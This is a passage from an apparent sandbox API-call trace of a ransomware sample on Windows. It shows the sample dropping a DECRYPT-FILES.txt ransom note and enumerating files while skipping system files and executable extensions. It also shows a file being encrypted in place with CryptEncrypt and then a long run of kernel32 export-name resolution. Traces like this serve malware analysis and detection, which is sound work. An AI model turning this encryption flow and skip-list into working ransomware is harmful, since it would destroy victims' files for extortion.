"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.562] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned 66 [0078.562] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.562] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\\\DECRYPT-FILES.txt") returned 84 [0078.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.563] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.564] CloseHandle (hObject=0x44c) returned 1 [0078.565] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned 66 [0078.565] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*" [0078.565] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31d42f10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xab0656e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab0656e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.565] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.565] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31d42f10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xab0656e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab0656e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.565] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.565] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.565] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab0656e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab0656e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab0656e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.565] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.565] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab0656e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab0656e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab0656e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.565] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.565] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.565] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.565] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.565] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.565] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.565] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.565] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.566] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.566] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.566] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.566] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.566] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.566] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.566] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.566] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned 66 [0078.566] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.566] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\" [0078.566] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\jkbimi8.tmp" [0078.566] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.566] CloseHandle (hObject=0x0) returned 0 [0078.566] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.566] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5db2c650, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5db2c650, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5db78910, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x509b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0078.566] lstrcmpiW (lpString1="Normal.dotm", lpString2="DECRYPT-FILES.txt") returned 1 [0078.567] lstrcmpiW (lpString1="Normal.dotm", lpString2="autorun.inf") returned 1 [0078.567] lstrcmpiW (lpString1="Normal.dotm", lpString2="boot.ini") returned 1 [0078.567] lstrcmpiW (lpString1="Normal.dotm", lpString2="desktop.ini") returned 1 [0078.567] lstrcmpiW (lpString1="Normal.dotm", lpString2="ntuser.dat") returned -1 [0078.567] lstrcmpiW (lpString1="Normal.dotm", lpString2="iconcache.db") returned 1 [0078.567] lstrcmpiW (lpString1="Normal.dotm", lpString2="bootsect.bak") returned 1 [0078.567] lstrcmpiW (lpString1="Normal.dotm", lpString2="ntuser.dat.log") returned -1 [0078.567] lstrcmpiW (lpString1="Normal.dotm", lpString2="thumbs.db") returned -1 [0078.567] lstrcmpiW (lpString1="Normal.dotm", lpString2="Bootfont.bin") returned 1 [0078.567] lstrlenW (lpString="Normal.dotm") returned 11 [0078.567] lstrcmpiW (lpString1="dotm", lpString2="lnk") returned -1 [0078.567] lstrcmpiW (lpString1="dotm", lpString2="exe") returned -1 [0078.567] lstrcmpiW (lpString1="dotm", lpString2="sys") returned -1 [0078.567] lstrcmpiW (lpString1="dotm", lpString2="dll") returned 1 [0078.567] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned 66 [0078.567] lstrlenW (lpString="Normal.dotm") returned 11 [0078.567] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\" [0078.567] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Normal.dotm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" [0078.567] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.567] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0078.567] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=20635) returned 1 [0078.568] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0078.568] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.569] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.569] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.569] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.570] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0078.570] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.571] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.571] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.572] CloseHandle (hObject=0x454) returned 1 [0078.572] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.572] WriteFile (in: hFile=0x450, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0078.573] CloseHandle (hObject=0x0) returned 0 [0078.573] CloseHandle (hObject=0x450) returned 1 [0078.574] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.574] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.574] GetTickCount () returned 0x114c246 [0078.574] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.575] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.575] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.575] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.575] lstrlenA (lpString="kernel32.dll") returned 12 [0078.575] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.575] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.576] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.576] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.576] lstrlenA (lpString="ADDATOMA") returned 8 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.576] lstrlenA (lpString="ADDATOMW") returned 8 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.576] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.576] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.576] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.576] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.576] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.576] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.576] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.576] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.576] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.576] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.576] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.576] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.576] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.577] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.577] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.577] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.577] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.577] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.577] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.577] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.577] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.577] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.577] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.577] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.577] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.577] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.577] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.577] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.577] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.577] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.577] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.578] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.578] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.578] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.578] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.578] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.578] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.578] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.578] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.578] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.578] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.578] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.578] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.578] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.578] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.578] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.578] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.578] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.578] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.579] lstrlenA (lpString="BEEP") returned 4 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.579] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.579] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.579] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.579] lstrlenA 